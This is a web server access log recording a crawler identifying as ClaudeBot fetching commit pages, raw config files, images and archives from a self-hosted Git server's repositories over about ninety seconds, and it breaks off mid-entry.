"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 216.73.216.188] [Length 11006] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 216.73.216.188] [Length 11007] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 216.73.216.188] [Length 11003] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9794] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 82562] [Gzip 10.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 9940] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9794] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 216.73.216.188] [Length 10974] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 216.73.216.188] [Length 11001] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 11098] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 9940] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 82363] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpip3" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9794] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpip" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.tar.gz" [Client 216.73.216.188] [Length 28289332] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2FActivate.ps1" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fpages" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 216.73.216.188] [Length 11719] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 216.73.216.188] [Length 11722] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10859] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.tar.gz" [Client 216.73.216.188] [Length 28288099] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Factivate.csh" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom1.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 216.73.216.188] [Length 11693] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom6.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 11522] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 216.73.216.188] [Length 11253] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 216.73.216.188] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 216.73.216.188] [Length 11715] [Gzip 3.20] [Sent-to 